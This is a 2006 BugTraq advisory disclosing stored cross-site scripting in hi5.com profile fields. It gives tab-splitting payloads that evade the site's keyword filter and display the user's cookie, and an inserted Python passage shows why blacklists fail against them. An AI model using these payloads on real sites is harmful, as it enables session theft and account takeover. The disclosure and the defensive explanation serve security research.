BugTraq
hi5.com - XSS with cookie disclosure Jun 13 2006 08:20AM
luny youfucktard com
hi5.com

Homepage:

http://www.hi5.com

Affected files:

Input boxes for editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows a lot of HTML tags to be used on their site, but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Here's a link to the page that lists all the tags they will and won't allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use an embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC, try putting this in your profile (I used the Hometown box, all should work tho):

<IMG SRC="jav ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav ascript:al ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag and not an img tag? I have no idea!
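As an added, defender-side illustration (not part of the original post) of why the keyword filter above fails: a substring blacklist looks at the raw bytes, while the browser first decodes character references and strips tabs before it reads the URL scheme. The check below normalizes the same way and then applies a scheme allow-list instead. It assumes the archive's "jav ascript" was originally the character reference &#x09;, and the attribute set, `SAFE_SCHEMES` and all function names are this example's own.

```python
import html
import re

# Browsers drop ASCII tab, LF and CR from a URL before reading its scheme,
# which is why an encoded tab inside "javascript" slips past a substring filter.
_URL_STRIP = re.compile(r"[\t\n\r]")
# Attributes whose value is (or, for style, contains) a URL. Assumed set.
_URL_ATTRS = re.compile(r'\b(src|href|style)\s*=\s*"([^"]*)"', re.I)
_CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]*)", re.I)
SAFE_SCHEMES = {"", "http", "https"}  # allow-list; "" means a relative URL

def naive_blacklist(fragment: str) -> bool:
    """Substring match on the raw input, the kind of check the post defeats."""
    words = ("javascript", "applet", "iframe", "document", "cookie")
    return any(w in fragment.lower() for w in words)

def normalize(value: str) -> str:
    """Decode character references, then drop the separators browsers ignore."""
    return _URL_STRIP.sub("", html.unescape(value))

def scheme_of(url: str) -> str:
    """Return the lower-cased scheme of a URL, or "" if it has none."""
    m = re.match(r"\s*([a-z][a-z0-9+.-]*):", url, re.I)
    return m.group(1).lower() if m else ""

def has_unsafe_url(fragment: str) -> bool:
    """True if any URL-bearing attribute resolves to a scheme outside the
    allow-list after normalization. style values are checked via their url() parts."""
    for name, raw in _URL_ATTRS.findall(fragment):
        value = normalize(raw)
        candidates = _CSS_URL.findall(value) if name.lower() == "style" else [value]
        if any(scheme_of(c) not in SAFE_SCHEMES for c in candidates):
            return True
    return False

# The post's two payloads, with the tab written as &#x09; (assumed encoding),
# plus a constructed benign style attribute to show the allow-list does not over-block.
IMG_PAYLOAD = '<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">'
DIV_PAYLOAD = '<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert(\'XSS\'))">'
BENIGN = '<DIV STYLE="background-image: url(http://example.com/bg.png)">'

if __name__ == "__main__":
    for p in (IMG_PAYLOAD, DIV_PAYLOAD, BENIGN):
        print(f"blacklist={naive_blacklist(p)!s:5} normalized={has_unsafe_url(p)!s:5} {p}")
```

Both payloads pass the blacklist and fail the normalized check; the benign background image passes both.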

Screenshots:

http://www.youfucktard.com/xsp/hi52.jpg

http://www.youfucktard.com/xsp/hi53.jpg

WHERES THE COOKIE?!?!

Now let's change that so we can show our cookie data. Since they don't seem to allow the words document and cookie, let's use the same method above to break it up. Try putting:

Popup alert:

<IMG SRC="jav ascript:alert(docu ment.coo kie);">

Write on screen:

<IMG SRC="jav ascript:docu ment.write(docu ment.cookie);">

Our Cookie:


Screenshots:

http://www.youfucktard.com/xsp/hi54.jpg

http://www.youfucktard.com/xsp/hi55.jpg
